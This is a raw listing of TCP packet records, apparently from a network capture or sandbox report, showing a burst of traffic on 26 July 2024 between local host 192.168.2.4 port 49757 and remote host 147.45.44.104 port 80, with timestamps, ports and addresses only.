Jul 26, 2024 18:56:39.479482889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479495049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479497910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479509115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479520082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479528904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479532957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479545116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479547024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479557037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479563951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479572058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479583979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479585886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479610920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479630947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480528116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480540991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480551958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480570078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480576038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480598927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480619907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480659962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480671883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480681896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480695009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480704069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480706930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480720043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480739117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480741024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480752945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480761051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480766058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480777979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480778933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480789900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480802059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480802059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480814934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480823040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480829000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480840921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480842113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480854034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480861902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480870962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480882883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480884075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480901003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480907917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480916023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480927944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480928898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480942011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480951071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.480956078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.480974913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.481005907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.481741905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481758118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481770039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481786966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481798887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481812954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481817961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.481827021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481839895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481849909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481851101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.481868029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481872082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.481884003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481892109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.481897116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481909037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.481911898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481929064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.481935978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.481951952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.481972933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.564884901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.564914942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.564925909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.564997911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565006971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565017939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565030098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565115929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.565154076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565160036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.565170050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565186024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565192938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.565196991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565208912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565210104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.565218925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565228939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565236092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.565242052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565252066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565269947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.565289974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.565468073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565479040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565488100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565496922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565507889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565516949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.565517902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565530062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565542936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.565568924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.565759897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565771103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565781116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565789938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565798998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.565799952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.565840960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566032887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566041946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566051960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566061020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566066027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566071987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566082954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566092968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566097021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566104889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566114902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566123962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566131115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566133976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566144943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566153049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566154957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566171885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566189051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566422939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566433907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566443920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566453934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566458941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566478968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566504002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566694021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566704988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566714048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566725016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566734076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566735029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566745996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566756010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566761971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566768885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566781998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566782951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566792011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566800117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566803932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566817045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566826105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566832066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566836119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566847086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566857100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566864014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566868067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566879034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566879988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566891909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566896915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566900969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566912889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566916943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566922903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566932917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566942930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.566950083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.566981077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567444086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567454100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567481041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567504883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567599058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567616940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567627907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567634106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567640066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567650080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567653894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567666054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567667961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567677975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567687035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567689896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567702055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567713022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567714930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567724943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567735910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567738056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567747116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567759037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567760944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567775011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567785025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567785978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567800999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.567809105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567831039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.567859888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.568255901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568267107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568276882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568286896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568296909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.568299055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568310976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568321943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568330050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.568332911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568341970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.568345070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568356037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568367958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.568367958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568380117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568389893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568392992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.568403006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568420887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.568444014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.568711996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568722963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568732977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568743944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568746090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.568756104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568762064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.568768024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.568792105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.568805933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.644712925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.644778967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.680140018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.680246115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.680341959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.680355072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.680392981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.681154966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.681166887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.681221962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.682147980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.682161093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.682204962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.682981014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.682993889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.683038950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.684083939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.684094906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.684139013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.685000896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.685010910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.685053110 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.685951948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.685966969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.685975075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.686012030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.686028004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.686932087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.686943054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.686994076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.687721968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.687733889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.687784910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.688510895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.688520908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.688558102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.688581944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.689313889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.689327955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.689337015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.689368963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.689393997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.690125942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.690139055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.690181971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.690927982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.690939903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.690979958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.691659927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.691669941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.691713095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.692430019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.692450047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.692476988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.692503929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.693239927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.693252087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.693260908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.693300009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.694070101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.694082975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.694123983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.694757938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.694770098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.694807053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.695534945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.695571899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.695605993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.695631027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.696295023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.696307898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.696317911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.696341991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.696367979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.696960926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.696973085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.697007895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.697669029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.697680950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.697717905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.698445082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.698456049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.698492050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.699139118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.699151039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.699160099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.699182034 CEST	49757	80	192.168.2.4	147.45.44.104
